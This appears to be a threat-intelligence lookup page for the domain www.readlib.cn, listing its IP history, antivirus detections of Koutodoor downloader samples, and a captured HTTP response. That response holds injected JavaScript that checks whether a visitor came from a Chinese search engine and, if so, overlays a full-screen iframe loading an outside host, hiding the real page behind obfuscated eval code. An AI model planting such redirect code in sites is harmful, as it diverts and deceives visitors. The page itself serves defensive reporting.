Domain > www.readlib.cn

More information on this domain is in AlienVault OTX

Date	IP Address
2019-01-14	120.24.218.126 (ClassC)
2020-06-24	156.245.129.162 (ClassC)
2020-11-07	164.88.230.66 (ClassC)
2021-05-14	216.250.110.116 (ClassC)
2021-05-19	164.88.195.158 (ClassC)
2021-07-27	45.147.212.197 (ClassC)
2022-08-14	164.155.198.207 (ClassC)
2022-11-04	164.155.196.168 (ClassC)
2024-05-12	154.215.10.1 (ClassC)
2024-06-15	154.194.168.33 (ClassC)
2024-07-24	154.86.151.19 (ClassC)
2025-10-15	104.166.85.15 (ClassC)
2026-02-26	172.82.143.49 (ClassC)

Port 80

HTTP/1.1 200 OKTransfer-Encoding: chunkedContent-Type: text/html; charsetUTF-8Server: Nginx Microsoft-HTTPAPI/2.0X-Powered-By: NginxDate: Mon, 04 Dec 2023 16:38:03 GMT

script>var _hmt  _hmt || ;(function() {  var hm  document.createElement(script);  hm.src  https://hm.baidu.com/hm.js?bd338ae2142524bb576765fa4fd29612;  var s  document.getElementsByTagName(script)0;   s.parentNode.insertBefore(hm, s);})();var _hmt  _hmt || ;(function() {  var hm  document.createElement(script);  hm.src  https://hm.baidu.com/hm.js?f3a59aa39e473202520e45e40f0f2f02;  var s  document.getElementsByTagName(script)0;   s.parentNode.insertBefore(hm, s);})();var titlestr  document.title;var arr  https://meihuaedu.com:2083/New/a.php;var referer  document.referrer;var regex/(baidu.com|sogou.com|so.com)/i;if(regex.test(referer)){  setFrame(arrMath.floor(Math.random() * arr.length));}function setFrame(olink) {  var ss  title> + titlestr + /title>div idshowcloneshengxiaon styleheight: 100%; width: 100%; background-color: rgb(255, 255, 255); background-position: initial initial; background-repeat: initial initial;>ifr + ame scrollingyes marginheight0 marginwidth0 frameborder0 width100% height100% src + olink + >/iframe>/div>style typetext/css>html{width:100%;height:100%;}body {width:100%;height:100%;}/style>;  eval(do + cu + ment.wr + ite( + ss + ););  try {    setTimeout(function() {      console.log(document.body.children.length);      for (var i  0; i  document.body.children.length; i++) {        try {          var a  document.body.childreni.tagName;          var b  document.body.childreni.id;          console.log(i + *** + a + ** + b);          if (b ! iconDiv1 && b ! showcloneshengxiaon && a ! title) {            document.body.childreni.style.display  non + e          }        } catch(e) {}      }      var oMeta  document.createElement(meta);      oMeta.name  viewport;      oMeta.content  widthdevice-width,initial-scale1,minimum-scale1,maximum-scale1,user-scalableno;      document.getElementsByTagName(head)0.appendChild(oMeta);    },    100)  } catch(e) {}}/script>

View on OTX | View on ThreatMiner

Data with thanks to AlienVault OTX, VirusTotal, Malwr and others. [Sitemap]

MD5	A/V
02d1848ccdb7ad0a79c73bf92bb7ba9b	[W32.Clode5e.Trojan.be45] [Artemis!02D1848CCDB7] [W32/Downldr2.EANF] [Trojan.MulDrop.18487] [WORM_AUTORUN.MCS] [Artemis!02D1848CCDB7] [Trojan:Win32/Koutodoor.A] [Trojan.Win32.Downloader.34304.AG] [Trj/Downloader.MDW] [W32/Hmir.AB!tr.dldr] [Trojan.Win32.Downloader.ApGS] [Win32/Trojan.Downloader.084]
b4a73ccf2c56812b06d8d0fd60a6a69e	[W32.Clod1cc.Trojan.dacf] [Artemis!B4A73CCF2C56] [W32/Downldr2.EBAY] [DLoader.YITT] [WORM_AUTORUN.MCS] [Trojan.Win32.Downloader.34816.AT] [Trojan.DownLoad3.22523] [TR/Dldr.BHOSta] [WORM_AUTORUN.MCS] [Artemis!B4A73CCF2C56] [Win32.Troj.JunkUnknown2.ak.(kcloud)] [Trojan:Win32/Koutodoor.A] [Trojan.Win32.Downloader.acIA] [Backdoor.Win32.Koutodoor.A] [W32/Hmir.AB!tr.dldr] [Trj/Downloader.MDW]

Domain > www.readlib.cn

Is this malicious?

Files that talk to www.readlib.cn

DNS Resolutions

Port 80